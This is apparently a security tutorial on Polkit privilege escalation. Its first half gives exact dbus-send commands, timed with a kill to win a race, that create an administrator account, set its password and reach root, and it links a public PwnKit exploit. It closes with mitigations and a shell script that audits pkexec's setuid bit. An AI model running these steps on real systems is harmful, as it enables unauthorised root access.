PolKit Privilege Escalation
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a dbus message.
# string:tester: The username of the new account ("tester").
# string:"Tester Account": The full name / description of the new user.
# int32:1: Account type 1 (administrator), which places the user in the sudo group.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Then check the new user ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Generate a password hash for the new user.
# -6: SHA-512 crypt
openssl passwd -6 password123
Copy the output hash and set it as the new user's password (the second string is the password hint).
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
su tester
Enter the password you created, e.g. "password123". Now switch to root.
sudo -s
# or
sudo su root
PwnKit is a local privilege escalation vulnerability in Polkit's pkexec. Many public exploits exist; one example:
https://github.com/Almorabea/pkexec-exploit (written in Python)
To mitigate the vulnerability, remove the setuid bit from the pkexec executable.
sudo chmod 0755 /usr/bin/pkexec
# or
sudo chmod 0755 `which pkexec`
Or simply upgrade the packages; most distributions ship patched versions of Polkit.
sudo apt update && sudo apt upgrade
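Added as a defender-side check, not taken from the original page: a POSIX shell audit that reports whether pkexec still carries the setuid bit that the chmod mitigation above removes. The function names (check_setuid, report_pkexec, pkexec_path) are my own.

```shell
#!/bin/sh
# Audit helper (added example): report whether a binary, by default pkexec,
# still has the setuid bit set. Exit codes: 0 = setuid present (action needed),
# 1 = no setuid bit, 2 = file not found.

# Locate pkexec via PATH, falling back to the usual location used on the page.
pkexec_path() {
  command -v pkexec 2>/dev/null || echo /usr/bin/pkexec
}

# Return 0 when the file has the setuid bit, 1 when it does not, 2 when absent.
# POSIX test -u checks the set-user-ID flag directly, no parsing of ls output.
check_setuid() {
  f="$1"
  [ -e "$f" ] || return 2
  if [ -u "$f" ]; then
    return 0
  fi
  return 1
}

# Print a one-line verdict ("SETUID:", "OK:" or "MISSING:") with mode and owner.
# Uses GNU stat first and falls back to the BSD stat syntax.
report_pkexec() {
  f="${1:-$(pkexec_path)}"
  if ! [ -e "$f" ]; then
    echo "MISSING: $f is not installed"
    return 2
  fi
  mode=$(stat -c '%a %U' "$f" 2>/dev/null || stat -f '%Lp %Su' "$f")
  if check_setuid "$f"; then
    echo "SETUID: $f ($mode) runs as its owner; upgrade polkit or chmod 0755 it"
    return 0
  fi
  echo "OK: $f ($mode) has no setuid bit"
  return 1
}

# Run against the path given on the command line, or the system pkexec.
# The verdict is printed; the exit status is deliberately not propagated so the
# script can also be sourced as a library.
report_pkexec "$@" || true
```

Dropping the setuid bit also stops pkexec from elevating privileges for legitimate, policy-allowed commands, so prefer the package upgrade where it is available and treat the chmod as a stopgap.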